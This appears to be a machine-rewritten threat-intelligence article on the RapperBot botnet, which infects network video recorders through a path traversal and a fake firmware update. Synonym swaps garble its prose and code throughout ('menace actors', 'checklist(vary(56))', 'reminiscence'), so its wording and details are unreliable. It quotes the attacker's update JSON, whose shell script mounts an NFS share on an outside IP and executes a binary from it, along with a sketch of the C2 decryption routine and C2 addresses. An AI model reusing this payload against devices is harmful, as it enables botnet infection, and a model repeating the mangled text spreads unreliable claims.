Cybersecurity researchers started detecting an alarming surge in early April 2025 in UDP flood site visitors emanating from compromised community video recorders (NVRs) and different edge units.
Inside milliseconds of an infection, these units have been weaponized to direct overwhelming volumes of packets at unsuspecting targets, resulting in service disruptions and large bandwidth consumption.
Bitsight analysts recognized this exercise because the work of a novel botnet they dubbed RapperBot, noting its unusually speedy kill chain and revolutionary use of legacy {hardware} constraints to evade detection.
18-port Ethernet Hub Setup (Supply – Bitsight)
The malware’s emergence follows a well-recognized sample: menace actors scan the Web for uncovered internet interfaces, brute-force or exploit default credentials, and ship a malicious payload disguised as a firmware replace.
As soon as executed, RapperBot instantly begins two distinct actions: encrypted DNS TXT file queries to acquire command-and-control (C2) IP addresses, and steady UDP floods on port 80.
Affect assessments present particular person gadget throughput exceeding 1 Gbps, with aggregated botnet capability peaking at over 7 Tbps throughout coordinated campaigns towards main targets, together with cloud-based search suppliers and social media platforms.
Regardless of its efficiency, the malware’s habits is elegantly easy: it mounts a distant NFS share to fetch and execute architecture-specific binaries, then self-deletes to run solely in reminiscence.
Bitsight researchers famous this technique leverages the minimal BusyBox setting on many IoT units, the place commonplace obtain instruments like curl or /dev/tcp are absent.
By exploiting the NVR’s firmware replace mechanism—particularly, a path traversal zero-day within the internet server adopted by a binary fetch over NFS—RapperBot avoids the same old filesystem artifacts that set off antivirus alerts.
Firmware Replace JSON Payload (Supply – Bitsight)
Below the hood, RapperBot’s C2 discovery mechanism depends on encrypted TXT information hosted on OpenNIC domains resembling iranistrash.libre and pool.rentcheapcars.sbs.
The malware constructs considered one of 32 predetermined hostnames by choosing randomly from hardcoded subdomain, area, and TLD lists, then resolves these names towards customized DNS servers (1.1.1.1, 8.8.8.8, and others).
The TXT response accommodates a pipe-separated checklist of encrypted IP addresses, which the bot decrypts with a customized RC4-like algorithm adopted by base-56 decoding.
A Python snippet illustrating the decryption phases seems beneath:-
# Stage 1: Key Scheduling Algorithm (KSA-like)
S = checklist(vary(56))
key = (first_byte_index + second_byte_index * 56)
for i in vary(55, 0, -1):
key = (0x41C64E6D * key + 0x3039) & 0xFFFFFFFF
j = key % (i + 1)
S[i], S[j] = S[j], S[i]
# Stage 2: Keystream-based XOR decryption
keystream = bytearray()
i = j = 0
for b in encrypted_payload[2:]:
i = (i + 1) % 56
j = (j + S[i]) % 56
S[i], S[j] = S[j], S[i]
keystream. Append(S[(S[i] + S[j]) % 56] ^ b)
# Stage 3: Base-56 decoding to acquire plaintext IP checklist
plaintext = base56_decode(keystream)
print(plaintext) # e.g., b”194.226.121.51|188.92.28.62|…”
Getting C2 IP addess and connecting to C2 (Supply – Bitsight)
An infection Mechanism
RapperBot’s an infection vector capitalizes on the executive port (TCP 34567) of susceptible NVRs.
Upon figuring out an uncovered gadget, the attacker exploits a path traversal flaw to obtain account configuration recordsdata, revealing each hashed and plaintext credentials.
With these credentials, the attacker initiates a pretend firmware replace, sending a ZIP-formatted payload over the proprietary replace protocol.
The ZIP archive accommodates a easy InstallDesc JSON instructing the gadget to mount 104.194.9.127:/nfs and execute the payload script:-
{
“UpgradeCommand”: [
{
“Command”: “Shell”,
“Script”: “cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;”
}
]
}
This strategy cleverly bypasses the NVR’s BusyBox limitations—no wget, curl, or / dev/tcp—by utilizing NFS, a protocol universally supported even on minimal embedded Linux techniques.
The script iterates by way of a number of ARM structure binaries till profitable, writes a marker file .r, then cleans up, leaving no on-disk executable.
The rapid execution from mounted reminiscence considerably reduces forensic footprint and allows the split-second transition from benign gadget to lively DDoS participant.
Enhance your SOC and assist your crew shield what you are promoting with free top-notch menace intelligence: Request TI Lookup Premium Trial.
